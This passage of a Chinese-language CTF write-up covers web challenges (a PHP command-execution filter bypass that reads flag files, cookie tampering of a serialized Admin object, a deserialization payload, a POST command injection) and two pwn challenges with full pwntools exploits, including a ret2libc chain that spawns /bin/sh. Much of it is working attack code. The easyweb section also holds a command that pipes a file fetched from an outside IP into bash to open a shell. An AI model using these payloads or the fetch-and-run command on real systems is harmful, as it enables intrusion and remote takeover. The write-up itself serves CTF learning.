Cookie: user=O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22guest%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A0%3B%7D
Priority: u=0, i
X-Forwarded-For: 2.2.2.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://47.105.113.86:40001
Content-Type: application/x-www-form-urlencoded
Referer: http://47.105.113.86:40001/
Upgrade-Insecure-Requests: 1
Cache-Control: no-cache
Content-Length: 29

username=admin&password=admin

img

img

18、YWB_Web_命令执行过滤绕过

?cmd=print(base64_encode(file_get_contents('flag.php')));

img

img

<?
// Server-side snippet shown by the challenge: loads the flag from its fixed
// path and strips surrounding whitespace. Uses the short open tag, which
// only works when short_open_tag is enabled.
$filename = "/tmp/flag.nisp";
$content = trim(file_get_contents($filename));
?>
http://47.105.113.86:40002/?cmd=print(base64_encode(file_get_contents(%27/tmp/flag.nisp%27)));

img

img

19、YWB_Web_未授权访问

img

O:5:"Admin":2:{s:4:"name";s:5:"guest";s:7:"isAdmin";b:0;}

修改为

O:5:"Admin":2:{s:4:"name";s:5:"guest";s:7:"isAdmin";b:1;}

img

%4f%3a%35%3a%22%41%64%6d%69%6e%22%3a%32%3a%7b%73%3a%34%3a%22%6e%61%6d%65%22%3b%73%3a%35%3a%22%67%75%65%73%74%22%3b%73%3a%37%3a%22%69%73%41%64%6d%69%6e%22%3b%62%3a%31%3b%7d
  • 替换到cookie

img

20、YWB_Web_反序列化

img

<?php
class mylogin {
    // Plain data holder: both fields are public (PHP 4 `var` is an alias of `public`).
    public $user;
    public $pass;

    /**
     * @param string $user account name carried in the serialized payload
     * @param string $pass password carried in the serialized payload
     */
    function __construct($user, $pass) {
        list($this->user, $this->pass) = array($user, $pass);
    }
}

// Build the object with the password the challenge expects.
$obj = new mylogin("anyuser", "myzS@11wawq");

// Serialize the object into the PHP native format.
$serialized = serialize($obj);

// Print the payload.
echo "Payload: " . $serialized . "\n";

// 测试过滤后的效果
/**
 * Reproduce the target's blacklist: every "flag" and "php" substring becomes
 * "hack". str_replace applies the patterns one after another.
 *
 * @param string $name text to filter
 * @return string filtered text
 */
function filter($name) {
    return str_replace(array("flag", "php"), "hack", $name);
}

// Run the serialized string through the same blacklist as the target.
// NOTE: rewriting a serialized string after serialization can change the
// declared string lengths inside it, so unserialize() may fail or yield an
// object that differs from the original. Filter the raw fields before
// serializing, and pass allowed_classes to unserialize(), instead.
$filtered = filter($serialized);
echo "After filter: " . $filtered . "\n";

// Deserialize and check that the object survived the round trip.
$unserialized = unserialize($filtered);
if ($unserialized instanceof mylogin) {
    echo "Unserialized successfully!\n";
    echo "Password: " . $unserialized->pass . "\n";
} else {
    echo "Unserialization failed!\n";
}
?>

img

1
O:7:"mylogin":2:{s:4:"user";s:7:"anyuser";s:4:"pass";s:11:"myzS@11wawq";}

img

21、easyweb

<?php

// Any POST body with a "cmd" field is handed straight to exec(): this is an
// OS command injection sink, and the "@" hides the failure if the command
// cannot run. Fix: never pass request data to exec(); map an allow-listed
// token to a fixed command instead, and escape arguments with escapeshellarg().
if(isset($_POST['cmd'])){
    @exec($_POST['cmd'],$res,$rc);
    //echo $rc;
}else{
    echo "It works!";
}

// Prints this file's own source to the client, which is how the vulnerable
// code is disclosed to every visitor.
show_source(__FILE__);
?>
  1. 分析代码漏洞

    1. 代码中存在exec($_POST['cmd'],$res,$rc),直接执行用户通过POST传递的cmd参数,存在命令注入漏洞。
    2. 题目已提示flag位于/flag.txt,无需额外路径猜测。
  2. 利用方法

    1. 通过发送POST请求,在cmd参数中注入读取/flag.txt的命令(如cat /flag.txt)。

    2. 使用工具(如curl、Burp Suite或Python脚本)发送请求。例如:

      • curl -X POST http://47.105.113.86:40005/ --data-urlencode "cmd=XXXXXXXX"
        

        - 反弹shell

        ```Plain
        curl -X POST http://47.105.113.86:40005/ --data-urlencode "cmd=curl http://8.138.152.157/1.txt | bash"
  • 成功弹shell

img

Pwn

14、Canary

img

from pwn import *

def exploit():
    """Drive the challenge service at 47.105.113.86:30001 with a fixed payload.

    Menu choice 1 accepts the payload after the "code:" prompt; choices 2 and
    3 are then sent and the tube is handed over interactively.
    """
    p = remote('47.105.113.86', 30001)
    # Fixed code address; this presumes a non-PIE binary — confirm.
    sys_addr = 0x401581
    # 104 filler bytes, two zero qwords, then the address to return into.
    # NOTE(review): the stack-frame layout this padding assumes is not
    # visible here — confirm against the binary.
    payload = b'a'*(88+16) + p64(0) + p64(0) + p64(sys_addr)

    p.recvuntil('your choice')
    p.sendline('1')
    p.recvuntil('code:')
    p.sendline(payload)

    p.recvuntil('your choice')
    p.sendline('2')
    p.sendline('3')
    p.interactive()

if __name__ == '__main__':
    # Only connect when run as a script, not on import.
    exploit()

img

15、ez_pwn

img

  • EXP
from pwn import *

def setup_context():
    """Configure pwntools for a 64-bit Linux target with verbose tube logging."""
    settings = {'arch': 'amd64', 'os': 'linux', 'log_level': 'debug'}
    context.update(**settings)

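def init_connections(local=False):
    """Open the target tube.

    Args:
        local: when True run ``./pwn`` locally; otherwise (the default, as
            before) connect to the remote challenge service.

    Returns:
        A pwntools tube for the chosen target.
    """
    # The original spawned a local process and then immediately overwrote the
    # handle with the remote connection, leaving the local process running
    # and unreferenced; open exactly one target instead.
    if local:
        return process("./pwn")
    return remote("47.105.113.86", 30003)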

def load_binaries():
    """Parse the challenge binary and its libc; returns ``(elf, libc)``."""
    paths = ("./pwn", "./libc-2.31.so")
    return tuple(ELF(path) for path in paths)

def build_first_payload(elf):
    """Build the stage-one chain that writes write()'s GOT entry back to us.

    Args:
        elf: pwntools ELF of ./pwn, used for the write PLT and GOT addresses.

    Returns:
        Bytes: 0x28 filler, a lone ``ret`` for stack alignment, a call to
        ``write(2, &GOT[write], <rdx left as-is>)``, then a return into main
        so a second payload can be sent.
    """
    # Hard-coded gadget addresses; these presume a non-PIE binary — confirm.
    gadgets = {
        'pop_rdi': 0x4012c3,
        'pop_rsi_r15': 0x4012c1,
        'main_addr': 0x4011DD,
        'ret': 0x40101a
    }

    payload = flat(
        0x28 * b'a',
        p64(gadgets['ret']),
        # rdi = 2: output goes to fd 2, presumably because the challenge's
        # banner says it closes stdout — confirm against the binary.
        p64(gadgets['pop_rdi']), p64(2),
        # rsi = address of write's GOT slot; r15 receives a throwaway 0.
        p64(gadgets['pop_rsi_r15']), p64(elf.got['write']), p64(0),
        # rdx (the length) is not set by this chain, so whatever it holds is used.
        p64(elf.plt['write']),
        p64(gadgets['main_addr'])
    )
    return payload

def build_final_payload(libc_base, libc):
    """Build the stage-two chain: ``system("/bin/sh")`` at the resolved libc base.

    Args:
        libc_base: libc load address derived from the stage-one leak.
        libc: pwntools ELF of libc-2.31.so, for the ``system`` symbol and the
            "/bin/sh" string.

    Returns:
        Bytes: 0x28 filler, ret for alignment, pop rdi <- "/bin/sh", system.
    """
    system_addr = libc_base + libc.symbols['system']
    bin_sh_addr = libc_base + next(libc.search(b"/bin/sh"))

    payload = flat(
        0x28 * b'a',
        p64(0x40101a), # ret for stack alignment
        p64(0x4012c3), # pop rdi (same gadget address as in build_first_payload)
        p64(bin_sh_addr),
        p64(system_addr)
    )
    return payload

def main():
    """Run both stages: leak write()'s libc address, then send the system chain.

    Stage one sends the write()-based chain and reads 6 bytes back, which are
    zero-padded to 8 and interpreted as write's address inside libc; the libc
    base follows from the symbol offset in libc-2.31.so. Stage two sends the
    system("/bin/sh") chain built from that base and goes interactive.
    """
    setup_context()
    p = init_connections()
    elf, libc = load_binaries()

    # First stage: leak libc address
    first_payload = build_first_payload(elf)
    p.sendlineafter("Close your eye, and you are blind now.", first_payload)

    # A 6-byte read: userland x86-64 addresses fit in 6 bytes; the ljust pads
    # to the 8 bytes u64 needs. A short read would still unpack, just wrongly.
    leak = u64(p.recv(6).ljust(8, b'\x00'))
    libc_base = leak - libc.symbols['write']
    log.info(f"Leaked write@GLIBC: {hex(leak)}")
    log.info(f"Calculated libc base: {hex(libc_base)}")

    # Second stage: get shell
    final_payload = build_final_payload(libc_base, libc)
    p.sendline(final_payload)
    p.interactive()

if __name__ == "__main__":
    # Only connect when run as a script, not on import.
    main()
